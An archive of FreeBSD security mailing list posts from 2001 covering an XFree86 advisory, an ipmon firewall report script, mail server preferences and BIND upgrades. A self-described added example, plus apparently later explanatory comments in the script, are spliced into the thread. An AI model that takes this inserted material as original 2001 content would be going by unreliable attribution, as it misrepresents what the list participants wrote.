owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

Does this issue affect only those that installed the XFree86 3.3.6 port or does it also affect those who have installed FreeBSD 4.2 RELEASE.

If it does affect the RELEASE version what is the easiest way to fix this problem, without upgrading to XFree86 4.01.

Paul Andrews Internet: andrews@powersurfr.com

----- Original Message -----
From: "FreeBSD Security Advisories"
To: "FreeBSD Security Advisories"
Sent: Tuesday, January 30, 2001 2:09 AM
Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86

> -----BEGIN PGP SIGNED MESSAGE-----
>
> =============================================================================
> FreeBSD-SA-01:07 Security Advisory
> FreeBSD, Inc.
>
> Topic: Multiple XFree86 3.3.6 vulnerabilities
>
> Category: ports
> Module: XFree86-3.3.6, XFree86-aoutlibs
> Announced: 2001-01-23
> Credits: Chris Evans
> Michal Zalewski
> Affects: Ports collection prior to the correction date.
> Corrected: 2000-10-24 (XFree86-3.3.6)
> Vendor status: Fixed in XFree86 4.0.1, no patches released by vendor.
> FreeBSD only: NO
>
> I. Background
>
> XFree86 is a popular X server. It exists in three versions in the
> FreeBSD ports collection: 3.3.6 and 4.0.2, as well as a.out libraries
> based on XFree86 3.3.3.
>
> II. Problem Description
>
> The XFree86-3.3.6 port, versions prior to 3.3.6_1, has multiple
> vulnerabilities that may allow local or remote users to cause a denial
> of service attack against a vulnerable X server. Additionally, local
> users may be able to obtain elevated privileges under certain
> circumstances.
>
> X server DoS:
> Remote users can, by sending a malformed packet to port 6000 TCP,
> cause the victim's X server to freeze for several minutes. During
> the freeze, the mouse does not move and the screen does not update
> in any way. In addition, the keyboard is unresponsive, including
> console-switch and kill-server key combinations. Non-X processes,
> such as remote command-line logins and non-X applications, are
> unaffected by the freeze.
>
> Xlib holes:
> Due to various coding flaws in libX11, privileged (setuid/setgid)
> programs linked against libX11 may allow local users to obtain
> elevated privileges.
>
> libICE DoS:
> Due to inadequate bounds checking in libICE, a denial of service
> exists with any application using libICE to listen on a network port
> for network services.
>
> The XFree86-aoutlibs port contains the XFree86 libraries from the
> 3.3.3 release of XFree86, in a.out format suitable for use with
> applications in the legacy a.out binary format, most notably being the
> FreeBSD native version of Netscape.
> It is unknown whether Netscape is
> vulnerable to the problems described in this advisory, but it is believed
> that the only potential vulnerability is the libICE denial-of-service
> condition described above.
>
> The XFree86 and XFree86-aoutlibs ports are not installed by default
> (although XFree86 is available as an installation option in the
> FreeBSD installer), nor are they "part of FreeBSD" as such: they are
> part of the FreeBSD ports collection, which contains almost 4500
> third-party applications in a ready-to-install format. The ports
> collections shipped with FreeBSD 3.5.1 and 4.1.1 contain these problems
> since they were discovered after the releases, but the XFree86 problem
> was corrected prior to the release of FreeBSD 4.2. At the time of
> advisory release, the XFree86-aoutlibs port has not been corrected.
>
> FreeBSD makes no claim about the security of these third-party
> applications, although an effort is underway to provide a security
> audit of the most security-critical ports.
>
> III. Impact
>
> Local or remote users may cause a denial of service attack against an
> X server or certain X applications. Local users may obtain elevated
> privileges with certain X applications.
>
> If you have not chosen to install the XFree86 3.3.6 port/package or
> the XFree86-aoutlibs port/package, or you are running XFree86 4.0.1 or
> later, then your system is not vulnerable to this problem.
>
> IV. Workaround
>
> Deinstall the XFree86-3.3.6 and XFree86-aoutlibs ports/packages, if
> you have installed them.
>
> Note that any statically linked binaries which make use of the
> vulnerable XFree86 routines may still be vulnerable to the problems
> after deinstallation of the port/package. However due to the
> difficulty of developing a reliable scanning utility for such binaries
> no such utility is provided.
>
> V. Solution
>
> One of the following:
>
> 1) Upgrade your entire ports collection and rebuild the XFree86-3.3.6
> port.
>
> 2) Deinstall the old package and install an XFree86-4.0.2 package
> obtained from:
>
> [i386]
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/x11/XFree86-4.0.2_5.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11/XFree86-4.0.2_5.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11/XFree86-4.0.2_5.tgz
>
> [alpha]
> Packages are not automatically generated for the alpha architecture at
> this time due to lack of build resources.
>
> NOTE: XFree86-3.3.6 packages are no longer made available, only the
> newer XFree86-4.0.2 packages.
>
> Note also that the XFree86-aoutlibs port has not yet been fixed: there
> is currently no solution to the problem other than removing the
> port/package and recompiling any dependent software to use ELF
> libraries, or switching to an ELF-based version of the software, if
> available (e.g. the BSD/OS or Linux versions of Netscape, as an
> alternative to the FreeBSD native version). The potential impact of
> the vulnerabilities to the local environment may be deemed not
> sufficiently great to warrant this approach, however.
>
> 3) download a new port skeleton for the XFree86-3.3.6 port from:
>
> http://www.freebsd.org/ports/
>
> and use it to rebuild the port.
>
> 4) Use the portcheckout utility to automate option (3) above.
> The portcheckout port is available in /usr/ports/devel/portcheckout or the
> package can be obtained from:
>
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
> ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.4 (FreeBSD)
> Comment: For info see http://www.gnupg.org
>
> iQCVAwUBOm3xpFUuHi5z0oilAQF+zQQAiwIQSv6MemATgo6v2/QwMjttGpbMxbh2
> s94CK+aAlbtRlsrBZl6DIWwVydc1C3k6EHnM+NHqwhfOq/yrwp7JDKwVUmvi+5Qx
> 1UAY8QRu45OednLsyT2qUuNrowjMmkdB0EcsqQq2UvLtN2054m6AmpZk1t3TjGTr
> CCOFX30qIn0=
> =pI+q
> -----END PGP SIGNATURE-----
>
>
> This is the moderated mailing list freebsd-announce.
> The list contains announcements of new FreeBSD capabilities,
> important events and project milestones.
> See also the FreeBSD Web pages at http://www.freebsd.org
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-announce" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 12:12:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from icmp.dhs.org (unknown [24.108.142.198]) by hub.freebsd.org (Postfix) with ESMTP id E204D37B69D for ; Thu, 1 Feb 2001 12:11:59 -0800 (PST) Received: from localhost (modulus@localhost) by icmp.dhs.org (8.11.1/8.11.1) with ESMTP id f11KGlG72916; Thu, 1 Feb 2001 14:16:48 -0600 (CST) (envelope-from modulus@icmp.dhs.org) Date: Thu, 1 Feb 2001 14:16:47 -0600 (CST) From: disassembled To: "Thomas T.
Veldhouse" Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipmon and periodic In-Reply-To: <008c01c08c64$e07a3ee0$3028680a@tgt.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

I have written something like that, although it can be improved I am sure. I stored it under: /etc/periodic/daily/470.status-dev-ipl

#!/usr/local/bin/bash
# Generates a report on logged firewall activity
# written by modulus@icmp.dhs.org 2001
_date=$(date)

# Run ipmon in syslog mode for a moment so the entries still sitting in
# the ipf log device are flushed through syslogd into /var/log/messages,
# then stop it again. $! is the PID of the ipmon just started; the
# "ps | grep ipmon" pattern also matches the grep itself and would have
# killed any other ipmon on the box.
/sbin/ipmon -s -n I &
/bin/sleep 2
kill $!

# you can get rid of the ipmon -s N if you are not interested
# in your nat logging entries.
/sbin/ipmon -s N &
/bin/sleep 2
kill $!

# Start the report (> truncates, so the file need not be touched first).
# A fixed name in world-writable /tmp is open to symlink tricks by local
# users; a root-only directory is the safer place for it.
echo "Report Generated @ ${_date}" > /tmp/cron.ipf
echo "syntax of ipmon: ipmon -s -n -I" >> /tmp/cron.ipf

# Pull the ipmon entries out of syslog, dropping the syslog date, host
# and program prefix (fields 1-5); field 13 is skipped as in the original.
grep ipmon /var/log/messages \
    | awk '{ print $6,$7,$8,$9,$10,$11,$12,$14,$15,$16,$17,$18,$19,$20,$21,$22 }' \
    >> /tmp/cron.ipf

# mail(1) takes the message body on stdin; without the redirect the
# report is mailed empty.
/usr/bin/mail -s "firewall logged packet output" root@icmp.dhs.org < /tmp/cron.ipf

> Has anybody written a script or modified the current nightly periodic
> scripts to send ipmon output in the security email as is currently done for
> ipfw? I have switched to ipfilter and I would like to see my daily ipmon
> output - or at least the relevant stats.
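An added example, not part of modulus's script or of anything else in this thread: the same ipmon entries summarised instead of dumped, so the daily security mail shows which sources hit which blocked ports most often rather than a raw packet list. The sample syslog lines are constructed for this example, and the field layout they follow (interface, @group:rule, b or p, src,port -> dst,port) is assumed from ipfilter 3.4's ipmon -s output rather than taken from the poster's system; if your lines differ, the only thing to adjust is how the fields around the "->" token are picked.

```shell
#!/bin/sh
# Added example (not from the thread): summarise ipmon entries that
# "ipmon -s" has written to syslog, by action, source address and
# destination port, most frequent first.
#
# Assumed ipmon -s line layout (ipfilter 3.4, not verified against the
# poster's host):
#   <syslog prefix> <ts> <if> @<grp>:<rule> <b|p> <src>,<sport> -> <dst>,<dport> PR <proto> ...

# Constructed sample of /var/log/messages for this example.
SAMPLE_LOG='Feb  1 12:00:01 gw ipmon[123]: 12:00:01.000001 fxp0 @0:3 b 203.0.113.9,41000 -> 198.51.100.2,23 PR tcp len 20 60 -S IN
Feb  1 12:00:02 gw ipmon[123]: 12:00:02.000002 fxp0 @0:3 b 203.0.113.9,41001 -> 198.51.100.2,23 PR tcp len 20 60 -S IN
Feb  1 12:00:03 gw ipmon[123]: 12:00:03.000003 fxp0 @0:1 p 192.0.2.7,53 -> 198.51.100.2,1025 PR udp len 20 80 IN
Feb  1 12:00:04 gw sshd[99]: Accepted publickey for root
Feb  1 12:00:05 gw ipmon[123]: 12:00:05.000004 fxp0 @0:3 b 203.0.113.44,2222 -> 198.51.100.2,111 PR tcp len 20 60 -S IN'

# summarize_ipmon < syslog-lines
# Prints "<count> <action> <src> -> dport <dport>", highest count first.
summarize_ipmon() {
    grep ' ipmon\[' | awk '
        {
            # locate the "->" token so field positions do not depend on
            # how many tokens the syslog prefix or -n resolution added
            for (i = 1; i <= NF; i++) if ($i == "->") break
            if (i > NF || i < 3) next          # not a packet line
            act = $(i-2); src = $(i-1); dst = $(i+1)
            sub(/,.*/, "", src)                # keep address, drop source port
            sub(/.*,/, "", dst)                # keep destination port only
            n[act " " src " -> dport " dst]++
        }
        END { for (k in n) print n[k], k }' | sort -rn
}

# Stand-alone run against the constructed sample; on a real host use
#   summarize_ipmon < /var/log/messages
printf '%s\n' "$SAMPLE_LOG" | summarize_ipmon
```

Dropped into the poster's script in place of the awk field dump, the output would read "2 b 203.0.113.9 -> dport 23" for the sample above, which is the line a reader of the morning mail actually wants: a repeat offender against a blocked port, not two near-identical packet records.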
> I would hate to replicate the work
> if it has already been done :)
>
> Tom Veldhouse
> veldy@veldy.net
>
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 12:18:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 05B8337B6CC for ; Thu, 1 Feb 2001 12:18:28 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id CE6D81AB2; Thu, 1 Feb 2001 15:18:26 -0500 (EST) Date: Thu, 1 Feb 2001 15:18:26 -0500 From: Will Andrews To: Paul Andrews Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Message-ID: <20010201151826.C479@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Paul Andrews , security@FreeBSD.ORG References: <200101300909.f0U99qv87528@freefall.freebsd.org> <005301c08c89$33722260$b13e6c18@videon.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="QnGs129iAKyuXRcc" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005301c08c89$33722260$b13e6c18@videon.ca>; from andrews@powersurfr.com on Thu, Feb 01, 2001 at 12:57:26PM -0700 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--QnGs129iAKyuXRcc Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote:
> Does this issue affect only those that installed the XFree86 3.3.6 port or
> does it also affect those who have installed FreeBSD 4.2 RELEASE.

FreeBSD != XFree86. The advisory specifies what is vulnerable.
> If it does affect the RELEASE version what is the easiest why to fix this
> problem, without upgrading to XFree86 4.01.

If you have no users, just firewall off your X sockets (or tell X to turn them off). If you have users, just make sure they can't run anything setuid linked to libX11. 8)

For other fixes, see below (as specified in the advisory):

> > 1) Upgrade your entire ports collection and rebuild the XFree86-3.3.6
> > port.
> >
> > 2) Deinstall the old package and install an XFree86-4.0.2 package
> > obtained from:
> >
> > [i386]
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/x11/XFree86-4.0.2_5.tgz
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11/XFree86-4.0.2_5.tgz
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11/XFree86-4.0.2_5.tgz
> >
> > [alpha]
> > Packages are not automatically generated for the alpha architecture at
> > this time due to lack of build resources.
> >
> > NOTE: XFree86-3.3.6 packages are no longer made available, only the
> > newer XFree86-4.0.2 packages.
> >
> > Note also that the XFree86-aoutlibs port has not yet been fixed: there
> > is currently no solution to the problem other than removing the
> > port/package and recompiling any dependent software to use ELF
> > libraries, or switching to an ELF-based version of the software, if
> > available (e.g. the BSD/OS or Linux versions of Netscape, as an
> > alternative to the FreeBSD native version). The potential impact of
> > the vulnerabilities to the local environment may be deemed not
> > sufficiently great to warrant this approach, however.
> >
> > 3) download a new port skeleton for the XFree86-3.3.6 port from:
> >
> > http://www.freebsd.org/ports/
> >
> > and use it to rebuild the port.
> >
> > 4) Use the portcheckout utility to automate option (3) above.
> > The portcheckout port is available in /usr/ports/devel/portcheckout or the
> > package can be obtained from:
> >
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
> > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

-- 
wca

--QnGs129iAKyuXRcc Content-Type: application/pgp-signature Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6ecSSF47idPgWcsURAsq0AJ0XSfkjTM9YLQ8Pk67FvIfbKfpPPACfcZSA
aUpv0caroS9je49tfkCTdhA=
=JO6J
-----END PGP SIGNATURE-----

--QnGs129iAKyuXRcc--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 13: 6:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 3F47837B4EC for ; Thu, 1 Feb 2001 13:05:59 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id D93FCBA0CB; Thu, 1 Feb 2001 13:06:29 -0800 (PST) Date: Thu, 1 Feb 2001 13:06:29 -0800 From: Kris Kennaway To: Paul Andrews Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Message-ID: <20010201130629.B74541@xor.obsecurity.org> References: <200101300909.f0U99qv87528@freefall.freebsd.org> <005301c08c89$33722260$b13e6c18@videon.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="cvVnyQ+4j833TQvp" Content-Disposition: inline User-Agent: Mutt/1.2.5i
In-Reply-To: <005301c08c89$33722260$b13e6c18@videon.ca>; from andrews@powersurfr.com on Thu, Feb 01, 2001 at 12:57:26PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

--cvVnyQ+4j833TQvp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable

On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote:
> Does this issue affect only those that installed the XFree86 3.3.6 port or
> does it also affect those who have installed FreeBSD 4.2 RELEASE.
>
> If it does affect the RELEASE version what is the easiest why to fix this
> problem, without upgrading to XFree86 4.01.

My understanding is that the XFree86 distribution is built from whatever is in ports at the time of release. In fact, doesn't sysinstall just install the port these days anyway?

ls -l /var/db/pkg/XFree86*

Kris

--cvVnyQ+4j833TQvp Content-Type: application/pgp-signature Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6ec/VWry0BWjoQKURAoJ6AKDniLpISnjtZCH4qQL/mUbWZznX1gCfbkOV
Os2DP58566oVXtNgg06WsxY=
=eRwy
-----END PGP SIGNATURE-----

--cvVnyQ+4j833TQvp--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Feb 1 13:52:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from meow.osd.bsdi.com (meow.osd.bsdi.com [204.216.28.88]) by hub.freebsd.org (Postfix) with ESMTP id 85D8B37B491 for ; Thu, 1 Feb 2001 13:52:26 -0800 (PST) Received: from laptop.baldwin.cx (john@jhb-laptop.osd.bsdi.com [204.216.28.241]) by meow.osd.bsdi.com (8.11.1/8.9.3) with ESMTP id f11LkR357618; Thu, 1 Feb 2001 13:46:27 -0800 (PST) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To:
<20010201130629.B74541@xor.obsecurity.org> Date: Thu, 01 Feb 2001 13:52:11 -0800 (PST) From: John Baldwin To: Kris Kennaway Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Cc: security@FreeBSD.org, Paul Andrews Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 01-Feb-01 Kris Kennaway wrote: > On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote: >> Does this issue affect only those that installed the XFree86 3.3.6 port or >> does it also affect those who have installed FreeBSD 4.2 RELEASE. >> >> If it does affect the RELEASE version what is the easiest why to fix this >> problem, without upgrading to XFree86 4.01. > > My understanding is that the XFree86 distribution is built from > whatever is in ports at the time of release. In fact, doesn't > sysinstall just install the port thesedays anyway? > > ls -l /var/db/pkg/XFree86* > > Kris No, it builds the distribution from ports, and then engages in evilness to package up the bits in tarballs that mimic the normal XFree distributions. -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" 
- http://www.FreeBSD.org/

From owner-freebsd-security Thu Feb 1 15:37:04 2001
Date: Fri, 2 Feb 2001 00:36:40 +0100 (CET)
From: Joshua Goodall
To: Dag-Erling Smorgrav
Cc: Alfred Perlstein
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind

On 1 Feb 2001, Dag-Erling Smorgrav wrote:
> Does anybody read this list, or do you all just post to it without
> reading anything anyone else is posting? I posted detailed
> instructions for a) upgrading a vulnerable system without making
> world, and b) setting up BIND in chroot and jail sandboxes, including
> how to deal with ndc and log sockets, just a few days ago.

If you mean the one that begins with:

> RELENG_3 has been fixed, please follow the procedure below if you're
> running 2.2.x or 3.x (tested on 3.5-STABLE, should work on 2.2.x but
> no guarantees):

... then I confess that I read that paragraph and skipped the rest since
I'm on 4.2-STABLE and I was wading through too many emails on the subject.

Although, yes, having gone back, it is certainly relevant and useful for
RELENG_4 trackers.

j

--
Joshua Goodall

A friend of mine works for a medium-sized telco.
He has no phone, because (and I quote) "the lady who provisions phones is on holiday"

From owner-freebsd-security Thu Feb 1 15:48:38 2001
Date: Thu, 1 Feb 2001 15:48:47 -0800
From: Kris Kennaway
To: John Baldwin
Cc: Kris Kennaway, security@FreeBSD.org, Paul Andrews
Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86
Message-ID: <20010201154847.A74995@xor.obsecurity.org>
References: <20010201130629.B74541@xor.obsecurity.org>

On Thu, Feb 01, 2001 at 01:52:11PM -0800, John Baldwin wrote:
>
> On 01-Feb-01 Kris Kennaway wrote:
> > On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote:
> >> Does this issue affect only those that installed the XFree86 3.3.6 port or
> >> does it also affect those who have installed FreeBSD 4.2 RELEASE.
> >>
> >> If it does affect the RELEASE version what is the easiest way to fix this
> >> problem, without upgrading to XFree86 4.01.
> >
> > My understanding is that the XFree86 distribution is built from
> > whatever is in ports at the time of release.  In fact, doesn't
> > sysinstall just install the port these days anyway?
> >
> > ls -l /var/db/pkg/XFree86*
> >
> > Kris
>
> No, it builds the distribution from ports, and then engages in evilness to
> package up the bits in tarballs that mimic the normal XFree distributions.

OK, and the reason we can't just leave it a port is because of General
Sysinstall Evilness?

kris

From owner-freebsd-security Thu Feb 1 15:57:05 2001
Date: Thu, 01 Feb 2001 15:56:29 -0800 (PST)
From: John Baldwin
To: Kris Kennaway
Cc: Paul Andrews, security@FreeBSD.org
Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86
In-Reply-To: <20010201154847.A74995@xor.obsecurity.org>

On 01-Feb-01 Kris Kennaway wrote:
> On Thu, Feb 01, 2001 at 01:52:11PM -0800, John Baldwin wrote:
>>
>> On 01-Feb-01 Kris Kennaway wrote:
>> > On Thu, Feb 01, 2001 at 12:57:26PM -0700, Paul Andrews wrote:
>> >> Does this issue affect only those that installed the XFree86 3.3.6 port
>> >> or
>> >> does it also affect those who have installed FreeBSD 4.2 RELEASE.
>> >>
>> >> If it does affect the RELEASE version what is the easiest way to fix this
>> >> problem, without upgrading to XFree86 4.01.
>> >
>> > My understanding is that the XFree86 distribution is built from
>> > whatever is in ports at the time of release.  In fact, doesn't
>> > sysinstall just install the port these days anyway?
>> >
>> > ls -l /var/db/pkg/XFree86*
>> >
>> > Kris
>>
>> No, it builds the distribution from ports, and then engages in evilness to
>> package up the bits in tarballs that mimic the normal XFree distributions.
>
> OK, and the reason we can't just leave it a port is because of General
> Sysinstall Evilness?

Something like that, yes.  If someone were to undertake splitting the
XFree86-3 port up into separate ports like the XFree86-4-* ports, that
follow the same split, then we might be able to convince jkh to switch to
using that instead of the X distributions.  Maybe.  If we are real lucky. :)

> kris

--
John Baldwin -- http://www.FreeBSD.org/~jhb/
PGP Key: http://www.baldwin.cx/~john/pgpkey.asc
"Power Users Use the Power to Serve!"
- http://www.FreeBSD.org/

From owner-freebsd-security Thu Feb 1 18:09:06 2001
Message-ID: <3A7A180F.518292C1@esec.com.au>
Date: Fri, 02 Feb 2001 13:14:39 +1100
From: Sam Wun
To: disassembled
Cc: "Thomas T. Veldhouse", freebsd-security@FreeBSD.ORG
Subject: Re: ipmon and periodic

Hi,

does anyone know how to convert a packet to number of bytes?

Thanks
Sam

From owner-freebsd-security Thu Feb 1 18:34:05 2001
From: David Gilbert
Message-ID: <14970.7298.155915.471272@trooper.velocet.net>
Date: Thu, 1 Feb 2001 21:33:38 -0500 (EST)
To: "Andre Hall"
Cc: "Dragos Ruiu", "Christopher Farley", "Fenix"
Subject: [security] Re: sendmail vs. postfix question
In-Reply-To: <001c01c08c60$a49ee640$040aa8c0@pcgameauthority.com>
References: <01020104192002.01203@xs4some.net> <20010131235613.A7019@northernbrewer.com> <01020103331409.27656@smp.kyx.net> <001c01c08c60$a49ee640$040aa8c0@pcgameauthority.com>

[various, deleted]

I must say that I actually understand sendmail at a low level.  Back in
'92 (before many alternatives were viable) I did significant raw .cf
hacking that I am confident modern alternatives would not be able to grok.
But those problems were extraordinary...

Last year, I installed one of our machines with postfix.  Since then, I
have been happy and when opportunity has presented itself, I have loaded
other machines with postfix in our network.  It performs well, and I have
only had minor issues.

 - recently rmail changed the flags it uses.  Caused some conniptions
   before I realized what was causing delivery failure.  Luckily uucp
   saves failed data.

 - One machine mysteriously "loses" the postfix master process.  It's
   still running, but not working ... and (annoyingly) at a different PID
   than "postfix reload" expects it to be.  I haven't got a fix for this
   one yet.

 - You can't get "real" status from Postfix.

The latter is apparently a design issue.  With little daemons doing little
jobs, it's difficult to get the type of status info that you get from
ps -axww about sendmail.

That said, only one major machine in our network is left running sendmail.
It will likely fall.  I could fix what I don't like about it with .cf
hacking, but postfix does its job better and has more direct configuration
for its issue.

In short, I like the security of non-root processing (esp. for smtpd).  I
like the simple configuration and speed.  I don't like that I can't tell
that a certain smtp instance is talking to a certain host X.

Dave.

--
============================================================================
|David Gilbert, Velocet Communications.       | Two things can only be      |
|Mail:       dgilbert@velocet.net             | equal if and only if they   |
|http://www.velocet.net/~dgilbert             | are precisely opposite.     |
=========================================================GLO================

From owner-freebsd-security Thu Feb 1 18:51:58 2001
Date: Thu, 1 Feb 2001 20:56:14 -0600 (CST)
From: disassembled
To: Sam Wun
Cc: "Thomas T. Veldhouse", freebsd-security@FreeBSD.ORG
Subject: Re: ipmon and periodic
In-Reply-To: <3A7A180F.518292C1@esec.com.au>

struct packet {
        struct tcp_header foo;
        struct ip_header var;
};

If you want to get the size of a tcp packet, (in the pseudo code above
that's a valid example)

the size of your tcp packet in bytes would be equal to:

sizeof(packet); /* if you are familiar with C that is */

is generally a good place to start.

hope this helps

On Fri, 2 Feb 2001, Sam Wun wrote:

> Hi,
>
> does anyone know how to convert a packet to number of bytes?
>
> Thanks
> Sam

From owner-freebsd-security Thu Feb 1 21:22:09 2001
Message-ID: <3A771A88.6F71AA2E@softweyr.com>
Date: Tue, 30 Jan 2001 12:48:24 -0700
From: Wes Peters
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: Re: bind8.2.3 and installation problem

Roger Marquis wrote:
>
> Mehmet Hinc wrote:
> > Stop in /usr/ports/net/bind8.
> > *** Error code 1
> >
> > What ??????????? Why??????????? I updated my ports and tried to install
> > bind8.2.3 because bind8.2.2 has had a vulnerability, so while I was
> > installing it, I had an error msg. (in the up)
> > please let me know How can I fix it !!!
>
> Bind was written on BSD.  What's the point of using a port to
> upgrade it?  All FreeBSD's bind port does is increase your chances
> of errors, reduce your system's overall QA, and install duplicate
> files in non-standard places.

You completely and utterly fail to understand how the ports system works.
What FreeBSD's bind port really does is decrease your chance of errors,
increase your system's overall QA, install all of the bind configuration
and executable files in standard FreeBSD locations, track which files were
installed and allow you to deinstall them simply, and provide a one-stop
upgrade path.

> The following steps have worked
> flawlessly over this and several bind upgrades:
>
>   cd /tmp
>   fetch ftp.isc.org/isc/bind/src/8.2.3/bind-src.tar.gz
>   tar xzvf bind-src.tar.gz
>   cd src
>   make install
>   killall named
>   named
>   ps auxww | grep named
>   cd /tmp
>   rm -rf src bind-src.tar.gz

Versus

  cd /usr/ports/net/bind8
  make install

Or, for an upgrade,

  make deinstall reinstall

Oh, yes, that simplifies things quite nicely.

--
            "Where am I, and what am I doing in this handbasket?"

Wes Peters                                                         Softweyr LLC
wes@softweyr.com                                           http://softweyr.com/

From owner-freebsd-security Thu Feb 1 21:30:48 2001
Message-ID: <3A7A47B7.242E4053@softweyr.com>
Date: Thu, 01 Feb 2001 22:37:59 -0700
From: Wes Peters
To: "Yuri A. Wolf"
Cc: freebsd-security@FreeBSD.org
Subject: Re: bind8.2.3 - where is the correct place to download src?

"Yuri A. Wolf" wrote:
>
> On Tue, 30 Jan 2001, Kris Kennaway wrote:
>
> > On Wed, Jan 31, 2001 at 09:45:37AM +0600, Yuri A. Wolf wrote:
> >
> > > i meant the place at ftp.freebsd.org where the port is. yesterday i
> > > downloaded the new port (with patches of course), but there was an error
> > > during patching (patch-ac). the sources were from ftp.isc.org, and i
> > > put them into distfiles, so there wasn't a mistake as i think...
> >
> > www.freebsd.org/ports - fairly obvious location, eh? :)
>
> yeah I know that, I was there hundreds of times...
>
> actually I just checked there is bind-8.2.2.p7 in title at
> http://www.FreeBSD.org/ports/net.html and links to 8.2.3 on ftp.isc.org
>
> that's why i asked
> well, i'll try to download and make port again... but I'm not sure changes
> made...

You can download and make the same port over and over again and it will
never change.  If you want to get the updated version, you will need to
update the port kit on your system, using CVSup or something like that.
